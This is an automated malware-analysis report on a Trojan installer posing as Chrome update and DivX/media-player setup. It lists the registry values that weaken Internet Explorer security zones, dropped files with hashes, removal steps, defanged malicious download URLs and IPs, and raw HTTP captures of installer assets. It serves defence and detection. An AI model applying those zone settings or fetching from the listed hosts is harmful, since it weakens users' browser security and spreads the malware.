[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"UninstallString" = "%Program Files%\Your Product\uninstall.exe /U:%Program Files%\Your Product\Uninstall\uninstall.xml"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"InstallLocation" = "%Program Files%\Your Product"
"URLInfoAbout" = "http://www.yourcompany.com"
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"Contact" = "Your Company Support Department"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"DisplayName" = "Your Product"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 00 60 AE EB 24 2A E3 19 B4 23 65 1A D4 A7 6E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"Publisher" = "Your Company"

The process chromeupdate.exe:1820 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A E7 12 98 0A 73 1B DF 13 86 55 77 36 1A D5 9D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5	File path
43e8f913fde18c9d26a5ef9fea97cfe7	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\MediaPlayer__15159_il35679.exe
e47d6ec4ca18c28652cc9512416f49d2	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe
ef609c21581a902f2f156f92477d91e4	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\chromeupdate.exe
42971c53e22b8a4d1e67bcab1cb65af8	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\msconfig.exe
c3f5f4a1fb69b5889f0bbb313cf6017f	c:\Program Files\Your Product\lua5.1.dll
9bdcf813d65265255b820bc7a704da3c	c:\Program Files\Your Product\uninstall.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):

   msconfig.exe:656
   %original file name%.exe:228
   irsetup.exe:188
   irsetup.exe:1668
   chromeupdate.exe:1820

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:

   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\left_image[1].png (2936 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\accept[1].gif (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\main[1].css (1177 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\MediaPlayer__15159_il35679.exe:typelib (8 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\finish[1].gif (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\cancel[1].gif (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\next[1].gif (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\amipb[1].js (29301 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\index[1].htm (8841 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\footer_img[1].png (937 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\cancel1[1].gif (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\decline[1].gif (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\skip[1].gif (1 bytes)
   %Documents and Settings%\%current user%\Desktop\Continue installation .lnk (898 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1609 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3IBTJDVO\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0CEZWSY\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1137 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\chromeupdate.exe (1351514 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RRMXQG38\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\getthefile.txt (32 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KJBRWXV1\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (16 bytes)
   %Program Files%\Your Product\lua5.1.dll (2902 bytes)
   %Program Files%\Your Product\Uninstall\IRIMG1.JPG (2 bytes)
   %Program Files%\Your Product\Uninstall\IRIMG2.JPG (29 bytes)
   %Program Files%\Your Product\Uninstall\uni3.tmp (9317 bytes)
   %Program Files%\Your Product\Uninstall\uninstall.xml (3475 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe (11824 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
   %Program Files%\Your Product\uninstall.exe (9213 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__15159_il35679.enc (7496 bytes)
   %Program Files%\Your Product\Uninstall\uninstall.dat (2104 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\msconfig.exe (16 bytes)
   

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name: Setup Factory Runtime
Product Version: 9.3.0.0
Legal Copyright: Setup Engine Copyright (c) 2004-2014 Indigo Rose Corporation
Legal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.
Original Filename: suf_launch.exe
Internal Name: suf_launch
File Version: 9.3.0.0
File Description: Setup Application
Comments: Created with Setup Factory
Language: English (United States)

Company Name: Product Name: Setup Factory RuntimeProduct Version: 9.3.0.0 Legal Copyright: Setup Engine Copyright (c) 2004-2014 Indigo Rose CorporationLegal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.Original Filename: suf_launch.exeInternal Name: suf_launchFile Version: 9.3.0.0 File Description: Setup ApplicationComments: Created with Setup FactoryLanguage: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	22296	22528	4.47735	c76b9ce587690b8a39ba7840b7dd540c
.rdata	28672	11906	12288	3.44864	e96aa4f970e6f6799910a72904df3100
.data	40960	6504	3072	1.79291	e504fdbba062ee9bbd9ac425a4f5c0f5
.rsrc	49152	114432	114688	5.20694	d1acdca72b7083ccd64674f12ec99111
.reloc	163840	4242	4608	2.5731	a88bdb6f651ecf67b1b3db4a2866ea4e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://bumpacpacba.com/down/kabo/apps.php	23.254.165.46
hxxp://ul.to/file/cmu9yf4p	81.171.123.200
hxxp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08	81.171.103.15
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css
hxxp://d3a3s75zr23wnc.cloudfront.net/V31/amipb.js
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png
hxxp://www.download-way.com/index.php	54.83.25.106
hxxp://uploaded.net/file/cmu9yf4p	81.171.123.200
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif	216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif	216.137.59.70
hxxp://www.download-way.com/finalize.php	54.83.25.106
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png	216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif	216.137.59.70
hxxp://cdn1.downloadsoup.com/V31/amipb.js	216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif	216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif	216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css	216.137.59.70
hxxp://ul.to/cmu9yf4p	81.171.123.200
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png	216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif	216.137.59.70
hxxp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif	216.137.59.70

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.download-way.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadsoup.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/css

Content-Length: 9386

Connection: keep-alive

Date: Thu, 10 Dec 2015 04:01:56 GMT

Content-Disposition: attachment; filename="main.css"

Last-Modified: Thu, 26 Feb 2015 16:19:17 GMT

ETag: "9d7c4ddc39dddc3623e8a57e55afd079"

Accept-Ranges: bytes

Server: AmazonS3

Age: 2898

X-Cache: Hit from cloudfront

Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: ihGFCsM8E_plzZ0J6HTBF9Hk8QKHpVjql3hy0vm1OaCsZhanKUhZog==

body {.. font-size:10px;. background:#eaeaea;. font-family: Arial;. margin: 0;. padding: 0;. color:#000000; .}..div, span, textarea {. cursor: default;.}..a, a span, a div {. cursor: pointer;.}../* whole screen styles */..ami-wrapper{. background : none no-repeat scroll 0 0 #eaeaea;. border:2px solid #989898; .}../* moddle element */..#ami-body.{..position: relative;. padding-left:27;. padding-right:27;.}...bottom-line{. background-color:#5cafd4;. height:45px;. width:100%;.}..table {. border-collapse: collapse;. margin: 0 ;. padding: 0;. font-size:10px;.}..textarea {..font-size:10px;..font-family: verdana;..width:98%;..padding: 5px;.}...textarea1{. background:#ffffff;. color:#000000;. height:100%;. width:100%;. overflow-x:hidden;.}..td{. padding: 0px;.}../* footer and footer buttons */...bottom-holder{. background-image:url('footer_img.png');. background-repeat:repeat-x;. height:59px;. position:absolute;. bottom:0px;. padding-left:20px;. padding-right:20px;.}...#btnNext{. background: url('next.gif') no-repeat;.}.#btnCancel{. background: url('cancel.gif') no-repeat;.}../* Use for cancle with no popup !!! */.#btnBack{. background: url('cancel1.gif') no-repeat;.}..#btnDecline{. background: url('decline.gif') no-repeat;.}..#btnAccept{. background: url('accept.gif') no-repeat;.}..#btnSkip{. background: url('skip.gif') no-repeat;.}...btn-finish-install{. background: url('finish.gif') no-r

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.download-way.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadsoup.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 937

Connection: keep-alive

Date: Fri, 18 Sep 2015 23:00:51 GMT

Content-Disposition: attachment; filename="footer_img.png"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "e2bf2d203887961a2e93c1a68b7e7534"

Accept-Ranges: bytes

Server: AmazonS3

Age: 22753

X-Cache: Hit from cloudfront

Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: fsZaDnw4YxQ1C1bo9ycU8q_uVjQ92b_dnFTMY4AfaH8i95_1ikRqTg==

.PNG........IHDR.......;........B....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:E57C9F23EFB911E397DFE4EB8E55B910" xmpMM:DocumentID="xmp.did:E57C9F24EFB911E397DFE4EB8E55B910"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E57C9F21EFB911E397DFE4EB8E55B910" stRef:documentID="xmp.did:E57C9F22EFB911E397DFE4EB8E55B910"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.b.y........g...?.(....0.....N.]l....IEND.B`.....

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.download-way.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadsoup.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1262

Connection: keep-alive

Date: Thu, 10 Dec 2015 04:01:56 GMT

Content-Disposition: attachment; filename="cancel.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"

Accept-Ranges: bytes

Server: AmazonS3

Age: 2897

X-Cache: Hit from cloudfront

Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: kneYqdjb33irVWIslI4GjhfH-yNyxQmdMbmQDpmUZ16MMWmiJQ7_0w==

GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................!.....u.,....e........ot.............o..nC.............GCn.t.D.............BC.EF.............EEJ.HHG.............H.J............*..IK.MNM......8.....H..H.`....*....!'O"J.H..D%....P.... C..8......D!.....0c.......4s.....O.....I.h.(S.QY.....K....c...Vg,.......f. 0.k... \..b.. L..@.J...)U.U.b......W.0......t..a.....7..7..."pt.<`...}/..M.o.,...^......_...`...MT.8p.........Z..../.^...j:Y.K.N.zt,,.`...;.)&.h.>....X4.p...z...D. ............................... }.J0...&x...f...-......AH.]pa..(..".A....=.(....p....X#...0#.5. ..A....H&ib.......PF).._x.E...`..^.0...n9..[z........".P..P.@..t..$...!..|....b..F.. ....$.....`....!g.6.j..?..A.[....?t............!d..........v....%.A.c.P@. .0..c.P..cT0@. .. ...P.... ......!gt......m...k..........n.f.AH...k...............p..../.......7.....!...Wl.K..c....C..!l.,..$..r.(....,.<r.".!..n.l..8....<....=.-..o....t....L7...s....;....

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.download-way.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadsoup.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1740

Connection: keep-alive

Date: Thu, 10 Dec 2015 04:01:58 GMT

Content-Disposition: attachment; filename="skip.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "7c96892b1948a6e97494e2d58cafe1c0"

Accept-Ranges: bytes

Server: AmazonS3

Age: 2896

X-Cache: Hit from cloudfront

Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: -apQrhg9QXRCyPP2fyUgdtnxuF7SDjvFauvCwh7jqXMXzUZAdQOFvQ==

GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,....e........|"E......*\......?...)....3j...... Cb.....R...\.....0c..I.&K8q........@...J....>...C...:P.J.J.*U.X.:......`...C....h....'...d..= W...x...Cp..=....L..`>}...Q...>b.....N.3~.k..y..>....M.....I...CB..1R......?....1.P............. _.\. :.f..$...@*@..$h. @y....$(P.A..._..O .....O.>.Ct..Idh. B.\.. ..........f.!D.0..D..Uha}..B.!..... .(.....H...Q."..b..! ...[..../4...Vxq.......D.9"!.....L6...O&....L........C... ......ta...$ D./ ...p:YH...h..x.......F....."/<A...0.. .x........J..D......z2B."..*....jj#.(.F.d8....|...#......t..!.$..........[*$.5..#.6....F.l#.0..#%....p...".........!.4.I...R.....m$.A............".T..%.pPC./.@....P.".......!.%......v.1...4.$$.l..(.lr%}HQ..f@.. .`..$..`...l0.'6T@..?.........*cB.%PG-..TW

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.download-way.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadsoup.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2157

Connection: keep-alive

Date: Thu, 10 Dec 2015 04:01:58 GMT

Content-Disposition: attachment; filename="next.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"

Accept-Ranges: bytes

Server: AmazonS3

Age: 2896

X-Cache: Hit from cloudfront

Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: YEk9S8jOVorpCH9cVz6nyJEb5E_2Lk6eZPEudQm6PZYsuwBWQBxi_g==

GIF89ae............pppC.K@.H>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.C<.D@.I>.F@.I?.H>.GC.MB.LB.K@.IE.OK.RT.\..$..# .%!..)&..%. ".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B8.><.B<.C;.B;.@7.=@.H>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~............................................$.('. %.)4.9).,).-*.. .-). .. .-*.--.10.41.5/.22.44.86.:C.HG.IH.L_.b.............................................'.(*.*(.)-../.0-.->.>C.E........................,. .&..................uuu...!.......,....e..........'......*\.........'.....f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL........2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<.....G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h......>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....<........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."....7.Xc...|.K(#(..................nD.D ....8.(aK>.............

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.download-way.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadsoup.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2157

Connection: keep-alive

Date: Thu, 10 Dec 2015 04:01:59 GMT

Content-Disposition: attachment; filename="finish.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"

Accept-Ranges: bytes

Server: AmazonS3

Age: 2895

X-Cache: Hit from cloudfront

Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: kgsrX92jwc2x2VRBAYO3YeumSb004M1L2IJQauwWIBVZfBh1sNvEYQ==

GIF89ae............pppC.K@.H>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.C<.D@.I>.F@.I?.H>.GC.MB.LB.K@.IE.OK.RT.\..$..# .%!..)&..%. ".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B8.><.B<.C;.B;.@7.=@.H>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~............................................$.('. %.)4.9).,).-*.. .-). .. .-*.--.10.41.5/.22.44.86.:C.HG.IH.L_.b.............................................'.(*.*(.)-../.0-.->.>C.E........................,. .&..................uuu...!.......,....e..........'......*\.........'.....f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL........2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<.....G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h......>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....<........8...G.f... .."K)S..M 